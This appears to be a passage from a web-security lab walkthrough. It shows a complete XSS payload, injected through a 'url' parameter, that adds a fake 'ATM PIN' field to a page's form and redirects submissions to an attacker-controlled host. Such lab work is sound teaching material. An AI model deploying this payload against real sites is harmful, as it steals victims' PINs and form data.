Task 4: Modify Form Fields
In this task, you have to insert an extra form element into the existing form and make the form submit to an attacker-controlled machine. This has to be done dynamically through an XSS vulnerability.
Again, by adopting the same approach, analyze the source code and find the injection point. In this task the injection point is the “url” parameter. Copy and URL-encode the code given below and paste it after the “url” parameter.
<script>
var frcon = document.forms[0];                 // the page's existing form
var atm = document.createElement('input');
atm.type = 'text';
atm.name = 'atm';
atm.placeholder = 'ATM PIN';
atm.className = 'input-block-level';           // same styling as the other inputs
frcon.insertBefore(atm, frcon.firstChild);     // place the new field at the top of the form
frcon.action = "http://localhost:8000/";       // same action change as in the last task
</script>
In this code, the first seven statements create the new form element “ATM”, and the last one, carried over from the last challenge, changes the action of the form. When the victim submits the form, the values of all its input elements are sent to the attacker's machine in a GET request, the same as in the last task.